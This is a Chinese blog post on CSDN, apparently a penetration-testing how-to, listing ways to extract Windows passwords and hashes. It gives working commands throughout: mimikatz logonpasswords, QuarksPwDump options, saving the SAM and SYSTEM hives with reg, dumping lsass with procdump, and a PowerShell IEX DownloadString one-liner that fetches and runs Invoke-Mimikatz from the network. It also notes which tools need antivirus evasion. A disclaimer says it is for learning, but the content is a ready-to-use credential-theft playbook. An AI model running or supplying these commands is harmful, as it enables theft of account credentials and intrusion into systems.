Windwos密码导出的几种姿势

最新推荐文章于 2023-08-09 21:57:40 发布
最新推荐文章于 2023-08-09 21:57:40 发布
阅读量1w 收藏 15
点赞数 2
文章标签: 渗透 密码
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzzjx7/article/details/52542326
版权

        这篇文章主要是介绍怎么在本地提取用户密码,把知识整理了一下,把知识整理起来的威力还是挺大的。以下的方式分为要免杀和不需要免杀的方式。文章介绍的技术具有一定的攻击性,主要用于学习。

要免杀:

1.Getapss

Getapss是由闪电小子根据mimikatz编译的一个工具,可以获取明文密码。现在有32位和64位了,直接运行getpass.exe。


2.QuarksPwDump

目前可以导出 :- Local accounts NT/LM hashes + history 本机NT/LM哈希+历史登录记录 – Domain accountsNT/LM hashes + history 域中的NT/LM哈希+历史登录记录– Cached domain password 缓存中的域管理密码 【这需要域管理员登陆过】。

其实这个目前不需要免杀,最新的尝试检验了一下,发现不免杀处理,效果也可以

用法:

Options :

-k   --get-system-key

-dhl --dump-hash-local

-dhdc --dump-hash-domain-cached

-dhd --dump-hash-domain (NTDS_FILE must be specified)

-db  --dump-bitlocker (NTDS_FILE must be specified)

-sf  --system-file FILE

-sk  --system-key KEY

-nt  --ntds-file FILE

-hist --with-history (optional)

-t   --output-type JOHN/LC (optional, if no=>JOHN)

-o   --output FILE (optional, if no=>stdout)

 

Example: quarks-pwdump.exe--dump-hash-domain --with-history

 

quarks-pwdump.exe -dhl


3.mimikatz的利用

这个一个法国人写的一款工具,可以得到windows明文密码,这只是功能之一,用处还有很大。例如黄金票据的利用,这里有介绍:http://www.freebuf.com/sectool/112594.html

第一条:privilege::debug

                //提升权限

第二条:sekurlsa::logonpasswords

              //抓取密码


不需要免杀:

1.使用注册表导出hash命令:

reg save hklm\sam C:\hash\sam.hive

reg save hklm\system C:\hash\system.hive

直接执行可以把windows里所有用户的hash在注册表中导出到文件里.

具体的执行命令方法有很多,这里就不探讨这个.

打开Cain读取导出的注册表文件的hash.



选择Cracker.-再选择第一个LM & NTLMhash导入注册表文件


右键选择add tolist-选择最后一个


先添加SAM文件


再添加boot key



可以获取hash值,hash值可以在这个网站那里破解.

http://www.objectif-securite.ch/ophcrack.php

2.procdump

procdump是微软官方提供的一个小工具,在微软官方有下载

地址:https://technet.microsoft.com/en-us/sysinternals/dd996900

将工具拷贝到目标机器上执行如下命令(需要管理员权限,我选择的版本是64位)

Procdump64.exe -accepteula -ma lsass.exelsass.dmp


将这个内存dump文件拷贝到mimikatz同目录下,双击打开mimikatz执行情况如图:

mimikatz # sekurlsa::minidump lsass.dmp

Switch to MINIDUMP

mimikatz # sekurlsa::logonPasswords full

3.Powershell+mimikatz的利用

在windows中powershell是白名单来的,不需要进行免杀,可以利用直接用poweshell来调用mimikatz进行明文的获取。  powershell "IEX(New-ObjectNet.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');  Invoke-Mimikatz"


也可以把mimikatz的poweshell文件放在边界的服务器上,利用powershell可以读取:


4.powershell+getpasshash

也是利用powershell,不过是利用getpasshash,这个还是要解hash值的。当不能够解除hash的时候,也可以进行wce进行hash的注入。

powershell "IEX (New-ObjectNet.WebClient).DownloadString('c:/Get-PassHashes.ps1');  Get-PassHashes "

成功导出hash


参考文章:

http://bbs.ichunqiu.com/thread-8826-1-1.html?from=paper





ZZZJX7
关注
  • 2
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Oracle导入导出数据的几种方式
09-09
今天小编就为大家分享一篇关于Oracle导入导出数据的几种方式,小编觉得内容挺不错的,现在分享给大家,具有很好的参考价值,需要的朋友一起跟随小编来看看吧
poi导出word的几种方法
09-20
这是grails框架的类似java开发,只是类型用def定义所有类型。
Windows10驱动导入导出
03-14
Windows10驱动导入导出 重装系统前,最好把系统的驱动导出,然后新系统再导入,这样就很方便 尤其是打印机等不方便的设备。 也可以从其他电脑导出,然后再自己的电脑导入
详解Mysql导出数据的几种方式
09-09
MySQL导出数据的目的有很多种,如数据库备份、表结构导出、表数据导出、分析数据采取等,本文详细的介绍了两种Mysql导出数据的方法,感兴趣的小伙伴可以了解一下
getpass.exe
08-06
getpass读取服务器密码
内网横向移动—Win&Linux&内存离线读取&Hashcat破解&RDP&SSH存储提取
最新发布
剁椒鱼头没剁椒的博客
08-09 737
关于SSH的密钥问题,本来想着先把关于SSH密钥的破解以及横向移动方式总结出来的,但是网上关于Linux系统横向移动手法,以及利用都太少了,目前也没看到很好的文章,很多问题确实把相关知识点总结了,但是感觉还是有点乱,所以就先把Linux横向移动方式先暂停,暂时不去总结Linux方面的横向移动。不过关于Linux方面的横向移动还是可以带一下的,因为从系统角度来说,Linux中横向移动的可利用方式确实少,正常情况下Linux系统利用多数都是利用Linux系统中安装的中间件软件等来实现横向移动。
横向移动之windows登录账号密码导出
yy
02-16 2600
在默认情况下,当系统为win10或2012R2及以上时,默认在内存缓存中禁止保存明文密码,所以无法在 lsass.exe 进程中抓取明文密码。此时可以通过修改注册表的方式抓取明文,但需要用户重新登录后才能成功抓取。
Windows Server2003本地用户的批量导入和导出
热门推荐
Enweitech Software Works
02-23 1万+
AD域环境的用户导入和导出 Windows server 2003 批量导入用户---CSVDE 在新搭建的域环境中,有许多的域帐号需要导入,可以采用csvde命令来导入域用户;新建一个txt文本文件,按照下图格式输入,保存退出。脚本:https://gallery.technet.microsoft.com/scriptcenter/ed20b349-9758-4c70-adc0
域内密码凭证获取
qq_58000413的博客
04-26 1242
Quarks Pw Dump是一款开放源代码的Windows用户凭据提取工具,它可以抓取windows平台下多种类型的用户凭据,包括:本地账户、域账户、缓存的域账户和Bitlocker。ntds.dit:活动目录数据库,包括有关域用户、组和成员身份的 信息。VSSAdmini:是Windows系统提供的卷影复制服务(VSS)的管理工具,域环境默认安装。ntds.dit文件位置:%SystemRoot%\NTDS\NTDS.dit。可以 十分高效的破解ntds文件并将全部域域用户信息导出方便查找域用户状态。
windows 命令行导出管理员账户
qq_53522710的博客
09-23 276
以管理员运行cmd,然后输入net user administrator /active:yes
Windows Server 2016-命令行批量导出AD用户信息
weixin_33854644的博客
02-26 1213
本章节为大家带来如何通过Powershell或ldifde命令行方式导出用户列表信息,方便大家日常运维工作中使用。Powershell方式导出现有Staff目录下所有用户信息列表:Get-ADUser-Filter*-Properties*-SearchBase"DC=staff,DC=azureyun,DC=com"|Select-Objectname,S...
注册表读取windows hash
lansefly1990的专栏
06-30 957
当目标为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,但可以通过修改注册表的方式抓取明文。 cmd修改注册表命令: reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f #重启或用户重新登录后可以成功抓取 cmd修改注册表命令: 1、从注册表读取windows hash reg save hklm\sa
计算机用户导入导出,Windows2003用户导入和导出工具
weixin_39970855的博客
06-22 713
Windows2003用户导入和导出==========================1、将 addusers.exe、copypwd.exe、copypwd.dll 拷贝到c盘根目录。2、备份用户账号:打开cmd,切换到路径为c盘(命令:cd C:),并运行addusers,命令:C:addusers /d:u account.bak // account.bak不能改名字,必须用这个参数:/...
转载:PowerShell实现本地用户和组迁移指南
呆子罗
11-18 4766
文章来源:http://technet.microsoft.com/zh-cn/library/dd379531 若要转载,请标明文章来源 本地用户和组迁移指南 2(共 3)对本文的评价是有帮助 - 评价此主题 更新时间: 2010年2月 应用到: Windows Server 2008 R2 本地用户和组迁移是 Windows Server
windows域导出账号命令
u013930899的博客
08-12 3709
windows域导出账号命令
导出导入本地计算机本地用户和组
iteye_9716的博客
03-21 2582
有时候服务器需要迁徙,需要把用户和组也转移过去,以下是针对windows 2003的方法 摘自网络: 当你的系统账号成千上万的时候,你手动去迁移,那是很痛苦的,现在我介绍两个工具来实现这个功能: addusers 在wind2k resource kit中的命令工具。 A, 备份AD账号 命令: c:\addusers.exe /d:u Account.bak //名字不能改...
导出windows密码技巧总结
渗透测试研究中心
12-16 6135
一、使用RPC控制lsass加载SSP,实现DUMP LSASS绕过杀软 1.已编译好的ssp.dll(建议自己编译) spp.dll 需要修改为完整的绝对路径,测试环境是win2012 管理员权限,提取的文件在C:\Windows\Temp\temp.bin,在windows 10 可能需要system权限。 编译成功的spp.dll文件以及loader注入器: https://github.com/Mr-xn/Penetration_Testing_POC/blob/master/tools/l
多种姿势抓取windows系统的hash值
p_utao的博客
09-12 4382
hashdump抓取密码 从目标机中提取hash值,破解hash值就可获得账号密码,计算机中的每个账号(如果是域服务器,则为域内的每个账号)的用户名和密码都存储在sam文件中,当计算机运行时,该文件对所有账号进行锁定,要访问就必须有系统级账号,所以要使用该命令就必须进行权限提升 在shell提示符下输入hashdump命令,将导出目标机sam数据库中的hash meterpreter > hashdump Administrator:500:44efce164ab921caaad3b435b5140
导出redis数据有几种方法导出
06-09
导出 Redis 数据有以下几种方法: 1. 使用 Redis 自带的命令:通过命令行执行 `BGSAVE` 命令来在后台保存数据到一个 RDB 文件中,然后再使用 `SAVE` 命令将数据保存到一个指定的文件中。 2. 使用 Redis Desktop Manager:Redis Desktop Manager 是一款 GUI 工具,可以通过它来导出 Redis 数据库中的数据,支持导出为 SQL 文件或者 JSON 文件。 3. 使用 Redis 数据库客户端:使用 Redis 数据库客户端(如 redis-cli)连接到 Redis 数据库,然后使用 `SAVE` 命令将数据保存到一个指定的文件中。 4. 使用 Redis 备份工具:有一些第三方的备份工具可以用来备份 Redis 数据,例如 Redis RDB Backup 和 Redis Dumper。这些工具可以让你更方便地备份和恢复 Redis 数据库。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值